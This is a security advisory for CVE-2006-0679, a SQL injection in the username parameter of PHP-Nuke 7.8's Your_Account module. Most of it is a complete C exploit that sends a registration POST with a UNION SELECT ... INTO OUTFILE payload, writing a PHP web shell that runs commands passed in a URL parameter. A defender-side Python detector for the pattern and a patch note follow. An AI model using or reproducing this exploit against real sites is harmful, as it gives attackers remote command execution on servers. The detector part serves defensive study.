Release date: 2006-02-28
Update date: 2006-02-28
Affected systems:
PHP-Nuke PHP-Nuke 7.8
Unaffected systems:
PHP-Nuke PHP-Nuke 7.9 + patch 3.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 16691
CVE(CAN) ID: CVE-2006-0679
PHP-Nuke is a widely used website creation and management tool. It can use many database products as its backend, such as MySQL, PostgreSQL, mSQL, Interbase and Sybase.
The Your_Account module of PHP-Nuke has an input validation vulnerability in its implementation; a remote attacker could exploit it to perform SQL injection attacks against the server application.
The Your_Account module of PHP-Nuke does not adequately filter the username parameter. A remote attacker could insert malicious SQL commands into this parameter and thereby gain unauthorized access to operations on the backend database.
<* Source: sp3x (sp3@xsecurityreason.com)
Link:
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!
sp3x (sp3@xsecurityreason.com) provided the following test code:
/*==================================================\
# SecurityReason.com                               |
# (sp3x)                                           |
#                                                  |
# /---------------------------\                    |
# | Critical SQL INJECTION    |                    |
# | PHPNuke <= 7.8            |                    |
# \---------------------------/                    |
#                                                  |
# PHPNuke-sp3x[1]                                  |
# This exploit is based on 'username'              |
# SQL injection vuln in Your_Account module.       |
#                                                  |
# References:                                      |
# securityreason.com/achievement_securityalert/32  |
#                                                  |
# ---| work only on mysql version > 4.0 |---       |
#                                                  |
#==================================================*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>        /* close() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80            /* port of the web server */

void begin(void);
void sqlinj(int sock, char *argv[]);

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in addr;
    struct hostent *hp = 0;

    /* begin() prints the usage text and exits */
    if (argc != 4) {
        begin();
    }
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("\n\n[-] Creating socket [FAILED]\n\n");
        exit(EXIT_FAILURE);
    }
    printf("\n\n[+] Creating socket [OK]\n");
    if ((hp = gethostbyname(argv[1])) == 0) {
        printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
        exit(EXIT_FAILURE);
    }
    printf("[+] Resolving %s [OK]\n", argv[1]);
    memset(&addr, 0, sizeof(addr));
    memcpy((char *)&addr.sin_addr, hp->h_addr, hp->h_length);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        printf("[-] Connecting at %s [FAILED]\n\n", argv[1]);
        exit(EXIT_FAILURE);
    }
    printf("[+] Connecting at %s [OK]\n", argv[1]);
    sqlinj(sock, argv);
    printf("[+] Now check the shell\n"
           "[+]\n");
    shutdown(sock, 2);
    close(sock);
    return (0);
}

void begin(void) {
    printf("*---------------------------------------*\n"
           "* SecurityReason                        *\n"
           "* EXPLOIT for PHPNuke <= 7.8            *\n"
           "* Coded by: sp3x   Date: 16.02.2006     *\n"
           "*---------------------------------------*\n\n"
           "Usage:\n"
           "PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
           "HOST - Host where is phpnuke example: localhost\n"
           "[path_phpnuke] - PHPNuke directory\n"
           "[s_directory] - shell directory where to upload\n\n"
           "Example:\n\n"
           "PHPNuke-sp3x[1] /phpnuke/html/ /home/sp3x/nuke78/html/shell.php\n"
           "After this go to\n\n");
    exit(0);
    return;
}

/* Build and send the registration POST whose 'username' field carries the
 * UNION SELECT ... INTO OUTFILE payload; argv[1] = host, argv[2] = path,
 * argv[3] = file the database server will write. */
void sqlinj(int sock, char *argv[]) {
    FILE *go;
    int size = 264;            /* body length without the output path */

    go = fdopen(sock, "a");
    if (go == 0) {
        perror("[-] fdopen [FAILED]\n\n");
        close(sock);
        exit(EXIT_FAILURE);
    }
    setbuf(go, NULL);
    size += strlen(argv[3]);
    fprintf(go, "POST %s HTTP/1.0\n"
                "Connection: Keep-Alive\n"
                "Pragma: no-cache\n"
                "Cache-control: no-cache\n"
                "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
                "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
                "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
                "Accept-Language: en\n"
                "Host: %s\n"
                "Referer: user\n"
                "User-Agent: SecurityReason - [SR]\n"
                "Content-Type: application/x-www-form-urlencoded\n"
                "Content-Length: %d\n\n"
                "name=Your_Account&op=new&"
                "user_password=hackme&user_password2=hackme&username="
                "s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\"; system($_GET[sr]);'"
                "/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
                "Cookie: lang=english\r\n\r\n",
            argv[2], argv[1], size, argv[3]);
    printf("[+] Sending exploit [OK]\n\n");
}
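As an added, defender-side example (not part of this advisory and not sp3x's code), the following Python function inspects a Your_Account registration POST body for the injection pattern described above: a quote breaking out of the username string, a comment-spaced UNION SELECT, INTO OUTFILE, and a trailing comment. The two request bodies are constructed samples, not captured traffic; the function name and the marker list are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Markers of the Your_Account 'username' injection: a quote that breaks out of
# the string, UNION ... SELECT, INTO OUTFILE (writing a file through the
# database server) and a trailing comment that swallows the rest of the query.
SQL_INJECTION_MARKERS = [
    ("quote_breakout", re.compile(r"'")),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("into_outfile", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("trailing_comment", re.compile(r"/\*[^*]*$|--\s*$|#\s*$")),
]

# Constructed sample bodies (not captured traffic).
BENIGN_BODY = "name=Your_Account&op=new&username=o%27brien&user_password=x&user_password2=x"
MALICIOUS_BODY = ("name=Your_Account&op=new&user_password=hackme&user_password2=hackme"
                  "&username=s%27/**/UNION/**/SELECT/**/%27x%27/**/FROM/**/nuke_authors"
                  "/**/INTO/**/OUTFILE/**/%27/tmp/x%27/*")


def normalize(value: str) -> str:
    """URL-decode and collapse /**/ comments, which MySQL accepts in place of spaces."""
    decoded = unquote_plus(value)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", decoded).strip()


def inspect_body(body: str) -> dict:
    """Classify a PHP-Nuke POST body; only Your_Account requests are examined."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get("name") != ["Your_Account"]:
        return {"suspicious": False, "reasons": [], "normalized": ""}
    username = normalize(params.get("username", [""])[0])
    reasons = [name for name, rx in SQL_INJECTION_MARKERS if rx.search(username)]
    # A lone apostrophe (O'Brien) is a legitimate name; require a SQL keyword as well.
    suspicious = any(r in reasons for r in ("union_select", "into_outfile"))
    return {"suspicious": suspicious, "reasons": reasons, "normalized": username}


if __name__ == "__main__":
    for body in (BENIGN_BODY, MALICIOUS_BODY):
        print(inspect_body(body))
```

The normalization step matters because the payload on this page never contains a literal space; matching on "UNION SELECT" without first collapsing the /**/ comments would miss it.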
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
PHP-Nuke
--------
The vendor has already released an upgrade patch to fix this security issue; please download it from the vendor's homepage: